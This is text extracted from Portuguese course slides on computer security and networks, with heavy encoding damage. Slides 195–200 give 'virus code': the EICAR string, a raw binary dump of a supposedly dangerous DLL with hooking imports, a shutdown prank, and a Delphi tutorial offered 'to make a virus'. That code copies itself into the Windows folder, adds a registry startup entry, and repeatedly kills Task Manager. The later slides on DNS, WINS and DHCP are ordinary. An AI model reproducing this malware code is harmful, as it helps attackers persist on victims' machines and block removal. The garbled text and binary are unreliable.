  • 189. PossĂ­veis danos ¨ Perda de desempenho do micro; ¨ ExclusĂŁo de arquivos; ¨ Alteração de dados; ¨ Acesso a informaçþes confidenciais por pessoas nĂŁo autorizadas; ¨ Perda de desempenho da rede (local e Internet); ¨ Monitoramento de utilização (espiĂľes); ¨ Desconfiguração do Sistema Operacional. ¨ InutilizarĂŁo de determinadas peças.
  • 190. 190 Detectando, prevenindo e combatendo os vĂ­rus
  • 191. 191 E os anti-vĂ­rus sĂŁo…
  • 192. Anti virus em ação
  • 193. Anti Spywere em ação
  • 195. CĂłdigo de VĂ­rus ¨ Teste X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD- 195 ANTIVIRUS-TEST-FILE!$H+H* ¨ Malicioso (Salvar no Bloco de Nota Vassoura.exe) AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE... AIL.COM/AMDWIN@*.*
  • 196. CĂłdigo de VĂ­rus (cont) ¨ Ctfmon32.dll Virus Perigoso – NĂŁo sai do computador: MZ ÿÿ @ @ Âş ´ Í!¸LÍ!This program € € cannot be run in DOS mode. 196 $ PE L ÎýwE Ă  ! A ” @ P êâ @ N 0 @@ .data l @ Ð.text m Ă .idata 0 @ À.edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL ÿÿÿÿÿÿÿÿU‰å‹E ƒøu(‹EÂŁ @ è# ÂĄ@ Àt Ăż5 @ è ¸ ëƒø u è— ¸ ĂŤ1ÀÉ U‰åƒìVuøVjh @ Ăż5 @ jÿÿz0@ h‚ @ ÿ‚0@ h @ Pÿ†0@ ÂŁ @ ĂżuĂżuĂżuĂżuĂżu ĂżuĂż @ ‰EĂźVjh @ Ăż5 @ jÿÿz0@ ^‹EüÉ U ‰åƒìVuøVjh2 @ Ăż5. @ jÿÿz0@ h‚ @ ÿ‚0@ hD @ Pÿ†0@ ÂŁ@ @ ĂżuĂżuĂżuĂżuĂżu ĂżuĂż@ @ ‰EĂźVjh: @ Ăż5. @ jÿÿz0@ ^‹EüÉ U ‰åƒìVWĂżuĂżuĂżuĂżuĂżu Ăżuèlÿÿÿ‰EĂŹ À…0 ‹}‹Eƒø uG‰Eð‹w ÇEø ÇEĂź ĂŤ ƒø… G‰Eð‹wÇEø ÇEĂź h@ ÿ’0@ š áå9Æu:š áùPĂżuðèÏ Àu&‹E £ @ @ĂżuĂżuĂżuĂżuPĂżuèÕþÿÿ‰EĂŹĂŠoe ĂżuĂżuĂżuĂżuĂż5 @ Ăżuè³þÿÿ‰EĂŹ Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ š áå9Æu<š áùPĂżuðèO Àu(¡ @ ;E s‹E @ĂżuĂżuĂżuĂżuPĂżuèPþÿÿ‰EĂŹĂŤĂżuĂżuĂżuĂżuĂżu Ăżuè4þÿÿ‰EĂŹ_^‹EìÉ U‰åƒìVWÇEüÿÿÿÿ‹M ‹}ž@ ßóf§ ÉuÇEĂź _^‹EüÉ U‰åƒìVuøVjhW @ Ăż5S @ jÿÿz0@ h‚ @ ÿ‚0@ hi @ Pÿ†0@ ÂŁe @ ĂżuĂżuĂżu ĂżuĂże @ ‰EĂźVjh_ @ Ăż5S @ jÿÿz0@ ^‹EüÉ U ‰åƒìVWĂżuĂżuĂżuĂżuĂżu Ăżuèóüÿÿ‰EĂŹ À…0 ‹}‹Eƒø uG ‰Eð‹wÇEø ÇEĂź ĂŤ ƒø… G‰Eð‹wÇEø ÇEĂź h@ ÿ’0@ š áå9Æu:š áùPĂżuðèËþÿÿ Àu&‹E ÂŁOE @ @ĂżuĂżuĂżuĂżuPĂżuèüÿÿ‰EĂŹĂŠoe ĂżuĂżuĂżuĂżuĂż5OE @ Ăżuè:üÿÿ‰EĂŹ Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ š áå9Æu<š áùPĂżuðèKÞÿÿ Àu(ÂĄOE @ ;E s‹E @ĂżuĂżuĂżuĂżuPĂżuè×ûÿÿ‰EĂŹĂŤĂżuĂżuĂżuĂżuĂżu Ăżuè»ûÿÿ‰EĂŹ_^‹EìÉ U‰åƒì VWĂżuĂżuĂżu Ăżuèþÿÿ‰Eôƒø |vƒ}upÇEø ‹} ‹WD; @ uÂĄ @ Ăż7‰þ7šð ßó¤Xë݉þ7VEĂź9Ăžu‹Eø Àt‹GD; @ u ‹uøÇ ë‰}ø‹}ü‹GD; @ u‹uø‹ë½_^‹EôÉ U‰åƒìVWh‚ @ ÿ‚0@ ‰EĂźhD @ ÿ–0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ–0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ–0@ ‰Á¾ @ ‰÷¬4jªâúhi @ Ăżuüÿ†0@ ÂŁS @ EøPjhW @ Ăż5S @ jÿÿ~0@ Æ_ @ hÇ` @ /%@ Æd @ ÍEøPjh_ @ Ăż5S @ jÿÿz0@ h @ Ăżuüÿ†0@ ÂŁ @ EøPjh @ Ăż5 @ jÿÿ~0@ Æ @ hÇ @ Ì#@ Æ @ ÍEøPjh @ Ăż5 @ jÿÿz0@ hD @ Ăżuüÿ†0@ ÂŁ. @ EøPjh2 @ Ăż5. @ jÿÿ~0@ Æ: @ hÇ; @ È!@ Æ? @ ÍEøPjh: @ Ăż5. @ jÿÿz0@ _^ÉÃU‰åÿuĂżu Ăżuj Ăż.1@ 1ÀÉ U‰åƒìEĂźPjhW @ Ăż5S @ jÿÿz0@ EĂźPjh @ Ăż5 @ jÿÿz0@ EĂźPjh2 @ Ăż5. @ jÿÿz0@ ÉÃU‰åj Ăż5 @ hN'@ jĂż*1@ jÿÿŽ0@ É U‰åVS‹udÂĄ0 ‹@ ƒÀ ‹ ;puù‹0‹X‰3‹p‹‰s@‹0‹X‰3‹p‹‰s[^É U‰åƒìVW‹u Âż@ f*f ÀtfÂŤĂŤĂľf«Ç@ ‹EÂŁ @ EĂźPj j hÂť'@ j j ÿŠ0@ _^É V0 <0 z0 1 J0 *1 KERNEL32.DLL USER32.DLL Ĺž0 ´0 È0 Ü0 ĂŽ0 Ăž0 1 1 Ĺž0 ´0 È0 Ü0 ĂŽ0 Ăž0 1 1 WriteProcessMemory ReadProcessMemory GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA 61 J1 61 J1 SetWindowsHookExA CallNextHookEx 2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A ÂŁ0*0¡0ĂŹ0ò0Ăş0Ăż01 111.191?1G1a1g1o1t1z11†1‹1ÂŁ1ÂŽ1´1Âź172=2d2”2¡2½2ĂĄ 2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4Âť4Á4ĂĽ4e5l5›5¡5Ø 5Þ5ĂŚ5ĂŹ5Ăł5 66 66 6'646=6B6M6S6[6a6h6l6r6~6„6OE6‘6ĹĄ6Ÿ6ÂŞ6°6¸6ž6Å6É6Ï6Û6ĂĄ6ĂŠ6ĂŽ6á6Ăź67 777"7&7,787>7F7^7u7{7ƒ7Ĺ˝7”7oe7§7*7Îź7Â7Ç7Ï7×7-8@8L8Y8c8
  • 197. CĂłdigo de VĂ­rus (cont) ¨ virus.bat Criem um atalho e na localização escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (ComentĂĄrio) 197
  • 198. Virus em Delphi ¨ Existe muitas maneiras de criar um virus em delphi, a maioria dos trojans famosos que circulĂŁo n internet foram feitos em delphi. Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del. ¨ Vamos la, Primeiro abra um projeto e coloque na uses "Registry," ¨ Agora em baixo de "{$R *.dfm}" coloque isso: 198
  • 199. procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); var sKey : string; reg : TRegIniFile; begin if( bRunOnce )then begin sKey := 'Once' end else begin sKey := ''; end; reg := TRegIniFile.Create( '' ); reg.RootKey := HKEY_LOCAL_MACHINE; reg.WriteString('SoftwareMicrosoft' + 'WindowsCurrentVersionRun'+ sKey + #0, sProgTitle, sCmdLine ); reg.Free; end; Agora no FormCreate coloque isso: procedure TForm1.FormCreate(Sender: TObject); begin Application.ShowMainForm := False; CopyFile(PChar(Application.ExeName),'C:WINDOWSvirus.exe',True); RunOnStartup('virus','C:WINDOWSvirus.exe',true); end; 199
  • 200. ¨ Agora vamos fazer a par te de travar a listagem de processos, vou dar o coder todo basta voce fazer sua ar te: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, TLHelp32, PsAPI, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} function TerminarProcesso(sFile: String): Boolean; var verSystem: TOSVersionInfo; hdlSnap,hdlProcess: THandle; bPath,bLoop: Bool; peEntry: TProcessEntry32; arrPid: Array [0..1023] of DWORD; iC: DWord; k,iCount: Integer; arrModul: Array [0..299] of Char; hdlModul: HMODULE; begin Result := False; if ExtractFileName(sFile)=sFile then bPath:=false else bPath:=true; verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo); GetVersionEx(verSystem); if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then begin hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); peEntry.dwSize:=Sizeof(peEntry); bLoop:=Process32First(hdlSnap,peEntry); while integer(bLoop)<>0 do begin if bPath then begin if CompareText(peEntry.szExeFile,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr y.th32ProcessID), 0); Result := True; end; end else begin if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr y.th32ProcessID), 0); Result := True; end; end; 200 bLoop := Process32Next(hdlSnap,peEntry); end; CloseHandle(hdlSnap); end else if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then begin EnumProcesses(@arrPid,SizeOf(arrPid),iC); iCount := iC div SizeOf(DWORD); for k := 0 to Pred(iCount) do begin hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]); if (hdlProcess<>0) then begin EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC); GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul) ); if bPath then begin if CompareText(arrModul,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end else begin if CompareText(ExtractFileName(arrModul),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end; CloseHandle(hdlProcess); end; end; end; end; procedure TForm1.Timer1Timer(Sender: TObject); begin TerminarProcesso('taskmgr.exe'); end; procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm := false; end; end.
  • 201. A Dor do “Blaster” ¨ Duas linhas de cĂłdigo C no RPCSS: – while (*pwszTemp != L'') *pwszServerName++ = *pwszTemp++; ¨ Levaram a – >15 milhĂľes de computadores infectados – 3.3M de chamados de suporte em Set. 2003 (volume normal relacionado a vĂ­rus ĂŠ de 350,000) – Muita repercussĂŁo negativa • “Isto aumentarĂĄ o nĂ­vel de frustração ao ponto que vĂĄrias organizaçþes irĂŁo contemplar seriamente alternativas Ă  Microsoft” Gartner Group • “É realmente recomendado ter cautela aqui. Os esforços [de segurança da Microsoft] foram sinceros, mas nĂŁo estou certo se foram sinceros o suficiente.” Forrester Research
  • 202. Em que abordagem vocĂŞ confia ? Segurança como uma opção Segurança como um aditivo Integração extremamente complicada NĂŁo ĂŠ economicamente viĂĄvel NĂŁo pode focar na principal prioridade Segurança como parte do sistema Segurança Embutida na Rede Colaboração inteligente entre os elementos VisĂŁo de sistemas Foco direto na principal prioridade
  • 203. JOGO DOS ERROS EDUCAÇÃO DO USUÁRIO É ESSENCIAL
  • 204. 204 PPrrĂĄĂĄttiiccaa ddee SSeegguurraannççaa xx
  • 213. DNS - Domain Name Service ¨PadrĂŁo Aberto para Resolução de Nomes HierĂĄrquicos – Agrupa nomes em domĂ­nios. – A ĂĄrvore de nomes ĂŠ armazenada num banco ddee ddaaddooss ddiissttrriibbuuĂ­Ă­ddoo. ¨Especificaçþes do DNS – RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536. • Expecificaçþes da Internet Task Force – Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley University para a versĂŁo 4.3 SD Unix
  • 214. Serviço DNS Nome? Nome? Serviço DNS um ou mais servidores armazenam um banco de dados distribuĂ­dos IP IPB Servidor DNS
  • 215. Nome de DomĂ­nio ¨ Os nomes HierĂĄrquicos utilizados pelo DNS sĂŁo chamados FQDN: – Fully Qualified Domain Name ¨ Exemplo: – www.pucpr.br – www: nome do host – pucpr: nome de domĂ­nio – br: nome de domĂ­nio ¨ Nome de domĂ­nio: – Coleção de HOSTS ou de outros domĂ­nios.
  • 216. Árvore de nomes br pucpr www ufpr ppgia br Pucpr www Ufpr ppgia www FOLHA RAIZ www
  • 217. Banco de Dados DistribuĂ­dos ¨ No serviço DNS, os nomes estĂŁo armazenados em ZONAS. Zonas sĂŁo arquivos textos que contĂŠm os nomes de um ou mais domĂ­nios. br pucpr www ufpr www RAIZ www ppgia ZONA .br ZONA pucpr.br ZONA ufpr.br
  • 218. Banco de Dados DistribuĂ­dos ¨ Cada Zona pode ser armazenada num servidor DNS distinto. br pucpr www ufpr www RAIZ servidor dns.br www ppgia ZONA .br ZONA pucpr.br ZONA ufpr.br servidor dns.pucpr.br servidor dns.ufpr.br
  • 219. Exemplo de arquivo de Zona ZONA pucpr.br ¨ @ SOA dns.pucpr.br ¨ @ NS dns.pucpr.br ¨ dns.pucpr.br. A 200.17.99.2 ¨ www A 200.17.99.2 ¨ www.ppgia A 200.17.98.174 SOA: START OF AUTHORITY NS: NAME SERVER A: HOST • SOA indica qual o servidor armazena o arquivo de zona • NS indica qual o servidor que responde pelo domĂ­nio. • Nomes terminados por “.” sĂŁo absolutos
  • 220. Exemplos de arquivo de Zona • @ SOA dns.br • @ NS dns.br • pucpr NS www dns.ufpr.br • ufpr NS dns.pucpr.br • dns.pucpr A 200.17.99.2 • dns.ufpr A 200.101.0.12 ¨ @ SOA dns.ufpr.br ¨ @ NS dns.ufpr.br ¨ dns.ufpr.br. A 200.101.0.12 ¨ www A 200.101.0.15 ZONA ufpr.br ZONA.br • @ SOA dns.pucpr.br • @ NS dns.pucpr.br • dns.pucpr.br. A 200.17.99.2 • www A 200.17.99.2 • www.ppgia A 200.17.98.174 ZONA pucpr.br
  • 221. Tipos de Registros no DNS ¨ A: Host Adress – associa um nome a um endereço IP: nnoommee Þ IIPP.. ¨ PTR: Point Resource Record – associa um endereço IP a um nome: IIPP Þ nnoommee.. ¨ NS: Name Server – identifica o servidor DNS no domĂ­nio. ¨ SOA: Start of Authority – indica que o servidor de DNS ĂŠ a autoridade para fornecer informaçþes no domĂ­nio (aauutthhoorriittaattiivvee).
  • 222. Consulta Reversa ¨ O cliente fornece um nĂşmero IP e requisita o nome correspondente. ¨ Os registros que relacionam IPs aos nomes sĂŁo do tipo PTR. – Por exemplo, um registro para o endereço IP 10.17.98.31 corresponde a uma entrada DNS no seguinte formato: • 31.98.17.10.in-addr.arpa ¨ Se o endereço IP nĂŁo estiver contido no domĂ­nio local (aquele controlado pelo servidor DNS consultado), o servidor DNS contata o servidor DNS situado num nĂł superior da ĂĄrvore. – Este mecanismo de procura seqĂźencial consultando os nĂłs superiores ĂŠ chamado “walking the tree”.
  • 223. Forwarder ¨ Cada servidor DNS possui um arquivo de configuração que diz: – Lista de zonas que ele armazena – Lista de servidores forwarders ¨ Lista de zonas – Indica a localização fĂ­sica do arquivo correpondente a cada ZONA. ¨ Lista de forwarders – Um forwarder ĂŠ um servidor DNS hierarquicamente superior ao servidor corrente. – Esse servidor recebe as consultas de domĂ­nios nĂŁo armazenados pelo servidor DNS.
  • 224. Exemplo Arquivo de configuração do servidor dns.pucpr.br forwarders { 200.17.99.2 } pucpr.br { /etc/pucprbr.dns } forwarders { primeiro forwarder segundo forwarder etc. } zona { localização } zona { localização }
  • 225. Ponteiros NS e Forwarders FORWARDER FORWARDER br NS NS ZONA pucpr.br ZONA ufpr.br pucpr www ufpr www ZONA .br RAIZ www ppgia
  • 226. Consulta Recursiva ¨ Graças ao ponteiros NS e FORWARDER qualquer servidor DNS pode responder por toda a ĂĄrvore de domĂ­nios. ¨ A resposta pode ser: – O mapeamento nome-IP requisitado – Uma mensagem de erro dizendo que o domĂ­nio ou host nĂŁo foi encontrado. ..bbrr ppuuccpprr uuffpprr aa bb cc dd RESPOSTA AUTORITÁRIA a.pucpr.br? IP = 10.17.98.31 d.ufpr.br IP = 200.17.98.174 1 RESPOSTA NÃO AUTORITÁRIA SE VIER DA CACHE 2 3 4 5 6 1 2
  • 227. DNS e a Internet ¨ O “root” da ĂĄrvore de nomes da Internet ĂŠ gerenciado pelo Internet Network Information Center (IInntteerrNNIICC) ¨ InterNIC ĂŠ o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc. – ProvĂŞ um serviço de registro de nomes para os domĂ­nios .com, .net, .org, and .edu; – O site do InterNIC ĂŠ http://www.internic.net ¨ O InterNIC delega a responsabilidade de administrar partes do domĂ­nio de nomes para as empresas e organizaçþes conectadas na Internet.
  • 228. DomĂ­nios Gerenciados pelo InterNIC ¨ Segundo a nomenclatura adotada na Internet, o “Domain Name Space“ ĂŠ dividido em trĂŞs ĂĄreas principais: – Organization Domains: • 3 caracteres para indicar a atividade da empresa. – .com, .edu, .gov, .int, .mil, .net, .org – .int: organizaçþes internacionais – .mil: organizaçþes militares – .org: organizaçþes nĂŁo comerciais – Geographical Domains: • 2 caracteres para identificar o paĂ­s. – .br, .fr, .jp, etc. – Reverse domain: • domĂ­nio especial utilizado para associar endereços IP aos nomes.
  • 229. Exemplo Gerido pelo InterNIC .com .org .edu .pucpr www ppgia rla01 Fully qualified domain name (FQDN) www.pucpr.br .br Gerido pela .com FAPESP Gerido pela PUC
  • 230. Zonas Servidor DNS do Internic .com .org .edu .pucpr www ppgia rla01 .br Servidor DNS da .com FAPESP Servidor DNS da PUC REGISTRO NS
  • 231. Tipos de Servidores ¨ PPrriimmĂĄĂĄrriioo – É o servidor autoritĂĄrio para zona. A inclusĂŁo, alteraçþes ou exclusĂŁo dos registros da zona sĂŁo feitas atravĂŠs deste servidor. – O servidor primĂĄrio envia uma cĂłpia dos seus arquivos de dados para o servidor secundĂĄrio atravĂŠs de um processo denominado ““zzoonnee ttrraannssffeerr”” ¨ SSeeccuunnddĂĄĂĄrriioo – Funciona como backup. Apenas lĂŞ os arquivos de dados do servidor primĂĄrio, e responde as requisiçþes dos clientes quando requisitado. ¨ CCaacchhiinngg--OOnnllyy – SĂŁo servidores DNS que apenas efetuam consultas e guardam o resultado numa cache e retornam os resultados. – Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.
  • 232. DNS - Resumo ¨ Vantagens: – Implementa um mecanismo de nomes hierĂĄrquico. • Isto facilita a organização dos nomes em redes de grande porte. – O banco de dados que armazena os nomes ĂŠ distribuĂ­do. • Cada servidor DNS contĂŠm informaçþes de zonas especĂ­ficas, e pode ser administrado separadamente. – É o mecanismo de nomes adotado na Internet. • Pode ser utilizado para resolver nomes na rede local (intranet) e na rede Internet. ¨ Desvantagem: – NĂŁo ĂŠ dinâmico. • É responsabilidade do administrador manter as entradas do arquivo de nomes atualizada.
  • 234. Nomes NetBIOS ¨ O espaço de nomes NetBIOS ĂŠ “flat” – flat = nĂŁo segmentado – implica que cada nome NetBIOS na rede deve ser Ăşnico ¨ Os recursos na rede sĂŁo identificados por nomes NetBIOS registrados dinâmicamente quando: – o computador ĂŠ inicializado – serviços sĂŁo inicializados – usuĂĄrio se loga. ¨ Nomes NetBIOS tem 16 caracteres de comprimento. – O usuĂĄrio atribui os 15 primeiros caracteres. – O Ăşltimo caracter ĂŠ reservado para indentificar o tipo de recursos.
  • 235. Nomes Registrados na Estação ¨ C:>nbtstat -n ¨ Endeço-Ip nĂł: [200.17.98.217] Identificador de escopo: [] ¨ Tabela de nomes locais de NetBIOS ¨ Nome Tipo Status ¨ ------------------------------------------------------------------------ ¨ PPGIA16 <00> UNIQUE Registrado ¨ PPGIA16 <20> UNIQUE Registrado ¨ MESTRADO <00> GROUP Registrado ¨ PPGIA16 <03> UNIQUE Registrado ¨ MESTRADO <1E> GROUP Registrado ¨ JAMHOUR <03> UNIQUE Registrado
  • 236. Nomes NetBIOS ¨ Podem ser de dois tipos: – UNIQUE (one owner) • Referenciam um Ăşnico recurso na rede • Exemplo: uma estação – GROUP (multiple owner) • Referenciam um conjunto de recursos na rede • Exemplo: nome de domĂ­nio, nome de grupo ¨ Alguns exemplos de tipos para identificadores Ăşnicos sĂŁo: – <00> Nome do Computador e do DomĂ­no (ou grupo) – <03> UsuĂĄrio logado – <20> Serviço de nomes de servidor para sincronização de arquivos compartilhados
  • 237. Registro e Resolução de Nomes NetBIOS ¨ Os seguintes mecanismos sĂŁo utilizados para localizar recursos NetBIOS – NetBIOS name cache – NetBIOS name server - WINS server – IP subnet broadcast – Static LMHOSTS files – Static HOSTS files – DNS servers ¨ Os mecanismos de resolução de nomes do NetBIOS sobre TCP/IP sĂŁo definidos pelas RFCs 1001 e 1002 – de acordo com a estratĂŠgia utilizada para resolver nomes, os computadores sĂŁo denominados b-node, p-nome, m-node ou h-node.
  • 238. Resolução de Nomes por BroadCast ¨ Resolução de nomes usado broadcast IP fornece um mĂŠtodo dinânico para resolução de endereços. – Datagrama “NetBIOS Name Query” em broadcast perguntando o nome correspondente ao endereço. – Endereço MAC: FF-FF-FF-FF-FF-FF – Endereço IP: 255.255.255.255 ¨ Problemas: – Aumento do trĂĄfego na rede – NĂŁo funciona em redes segmentadas por rotedores • Os recursos localizados em outras redes nĂŁo recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.
  • 239. Extranets = VPN (Virtual Private Networks) NOMES NETBIOS NOMES NETBIOS ACME IAPO1 IAPO2 LAB0101 PPGIA RREEDDEE AA RREEDDEE BB BROADCAST BROADCAST
  • 240. Cache com Nomes NetBIOS ¨ Cada estação mantĂŠm uma tabela com os nomes NetBIOS mais usados recentemente. ¨ C:>nbtstat -c ¨ Endereço-Ip nĂł: [200.17.98.217] Identificador de escopo: [] ¨ Tabela de nomes de caches remotas de NetBIOS ¨ Nome Tipo Endereço Host Duração [seg] ¨ --------------------------------------------------------------- ¨ PPGIA07 <00> UNIQUE 200.17.98.224 20 ¨ PPGIA07 <20> UNIQUE 200.17.98.224 600 ¨ HAL2001 <00> UNIQUE 10.17.98.31 660
  • 241. Usando o Arquivo HOSTS ¨ O arquivo “hosts” permite relacionar nomes a IP’s, evitando a resolução por broadcast. – A diretiva #PRE pode ser utilizada para registrar entradas diretamente na cache. – Neste caso, as entradas sĂŁo consultadas antes de qualquer outro mecanismo de resolução: ¨ Exemplos: • 10.17.98.31 hal2001 #pre #coloca a entrada na cache • 10.17.08.30 PPGIA16 #nĂŁo coloca na cache ¨ Existe tambĂŠm uma diretiva especial para definir domĂ­nios: • 10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP
  • 242. SERVIDORES DE NOMES NETBIOS ¨ MECANISMO DE RESOLUÇÃO DE NOMES NETBIOS SEM BROADCAST – MantĂŠm uma tabela que mapeia os endereços IP com o nome dos computadores. – A tabela ĂŠ atualizada ddiinnaammiiccaammeennttee toda a vez que uma mĂĄquina recebe um novo endereço IP. ¨ Exemplo: WINS: Windows Internet Name Service ¨ O serviço WINS trabalha numa arquitetura cliente-servidor. – WINS Server: • manipula todos as consultas de nomes. – WINS Client: • registra seu nome e endereço no servidor WINS. • envia as requisiçþes de nomes para o WINS server.
  • 243. WINS NÃO USA BROADCAST ACME IAPO1 IAPO2 LAB0101 PPGIA RREEDDEE AA RREEDDEE BB WINS SERVER IP e NOME sĂŁo fornecidos na inicialização TABELA DINÂMICA REQUEST REPLY
  • 244. CaracterĂ­sticas do WINS ¨ Ao contrĂĄrio da resolução de nomes por broadcast, WINS permite que os nomes sejam resolvidos de maneira transparente atravĂŠs de roteadores. WINS enabled replicação WINS proxy WINS server roteador LINK DE BAIXA WINS server CAPACIDADE Non- WINS enabled
  • 245. Definiçþes ¨ WINS Server – Computador que executa o serviço Windows Internet Name • Este computador mantem uma base de dados relacionando os nomes e os endereços IP das estaçþes na rede. – Pode haver mais de um servidor WINS na rede. ¨ Cliente WINS enabled – Estação configurada para resolver nomes pelo WINS. ¨ Cliente Non-WINS enabled – Estação nĂŁo configurada ou incompatĂ­vel com o serviço WINS. ¨ WINS proxy – Estaçþes que acessam o serviço WINS para os clientes Non-WINS enable.
  • 246. MĂşltiplos Servidores WINS ¨ A utilização de mĂşltiplos servidores WINS ĂŠ aconselhĂĄvel pois: – permite distribuir a carga de resolução de nomes • as consultas de nomes feita pelos clientes sĂŁo ponto-a- ponto. • O mecanismo de broadcast sĂł ĂŠ utilizado quando o nome solicitado nĂŁo ĂŠ encontrado na base do servidor WINS. – diminui a possibilidade de interrupção do serviço de nomes • cada servidor WINS possui uma cĂłpia completa da base de nomes, funcionando como backup dos demais. • quando um servidor entra em pane, os clientes passam a consultar automaticamente o outro servidor.
  • 247. WINS NÃO É APROPRIADO PARA INTERNET WINS SERVER WINS SERVER REPLICAÇÃO WINS SERVER WINS SERVER ¨ Para redes grandes, o WINS ĂŠ inviĂĄvel pois: – O nĂşmero de replicaçþes ĂŠ muito grande – Cada servidor WINS guarda uma cĂłpia completa de todos os nomes.
  • 248. Ciclo de Vida dos Nomes NetBIOS ¨ Os nomes NetBIOS sĂŁo concedidos por emprĂŠstimo. Precisam ser renovados periodicamente para que o computador mantenha o nome. Active (Ativo) Released (Liberado) Elimando O cliente foi desligado Ou o nome foi liberado explicitamente O prazo de renovação foi esgotado (6 dias) NĂŁo renovado (x dias) OUTRO COMPUTADOR PODE SOLICITAR O DIREITO DE USAR O NOME
  • 249. Resolução de Nomes ¨ Os mecanismos de resolução de nomes do NetBIOS sobre TCP/IP sĂŁo definidos pelas RFCs 1001 e 1002. – b-node: (broadcast-node) resolvem nomes por broadcast de IP – p-node: (point-to-point-node) usam um servidor de nomes NetBIOS – m-node: (mix -node) se b-node falhar tentam p-node. – h-node: (hybrid-node) se p-node falhar tentam b-node
  • 250. WINS - Resumo ¨ Vantagens: – Reduz significativamente o nĂşmero de broadcasts de endereços IP necessĂĄrios para localizar recursos locais e remotos. – Permite que clientes resolvam nomes de estaçþes situados em segmentos remotos isolados por roteadores. – Reduz a necessidade de manter e atualizar os arquivos LMHOSTS. ¨ Desvantagens: – NĂŁo implementa um mecanismo de nomes hierĂĄrquico. Isto dificulta a administração de redes de grande porte. – O banco de dados que armazena os nomes NetBIOS nĂŁo ĂŠ distribuĂ­do. Cada servidor WINS constitui uma rĂŠplica completa do banco de dados de nomes. – NĂŁo ĂŠ compatĂ­vel com o serviço de nomes usado na Internet.
  • 252. DHCP ¨Dynamic Host Configuration Protocol – PadrĂŁo Industrial Aberto • IETF RFC 1533, 1534, 1541 e 1542. – IETF: Internet Engineering Task Force – RFC: Request for Comments – Utilizado para centralizar a administração e configuração de parâmetros TCP/IP numa rede. – Elimina a necessidade de configurar manualmente os clientes numa rede TCP/IP.
  • 253. DHCP - Arquitetura Cliente- Servidor ¨ Um computador da rede deve funcionar como servidor DHCP. REQUEST REPLY CLIENTES DHCP SERVIDOR DHCP
  • 254. Administração de Endereços IP ¨ Cada computador numa rede TCP/IP deve ter um endereço IP Ăşnico. – O endereço IP identifica a estação e a rede ao qual a estação pertence. – Quando o computador ĂŠ movido para outra rede, seu endereço IP deve refletir esta mudança. ¨ DHCP especifica os seguintes serviços (RFC 1541): – um protocolo para que o servidor DHCP e seus clientes se comuniquem. • PROTOCOLO BOOTP – Um mĂŠtodo para configura os parâmetros de rede de um host IP: • IP, mĂĄscara, gateway default, servidores de nomes, etc.
  • 255. ESCOPO DHCP ¨ Quando se utiliza DHCP, cada rede local ĂŠ caracterizada por um ESCOPO: PARTE FIXA MASCARA GATEWAY SERVIDOR DE NOMES OUTRAS ROTAS PERÍODO DE EMPRÉSTIMO PARTE DINÂMICA RANGE DE IP’S MESMO VALOR PARA TODOS OS HOSTS DO ESCOPO UM VALOR DIFERENTE PARA CADA HOST DO ESCOPO
  • 256. Processo de Atribuição Cliente DHCP ESCOPO Servidor DHCP Dhcpdiscover Dhcpoffer 200.17.98.1 Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1 ...... Dhcprelease 200.17.98.1 TTooddaass aass mmeennssaaggeennss ssĂŁĂŁoo eennvviiaaddaass eemm bbrrooaaddccaasstt 255.255.255.0 200.17.98.23 72 horas 200.17.98.1 … 200.17.98.254
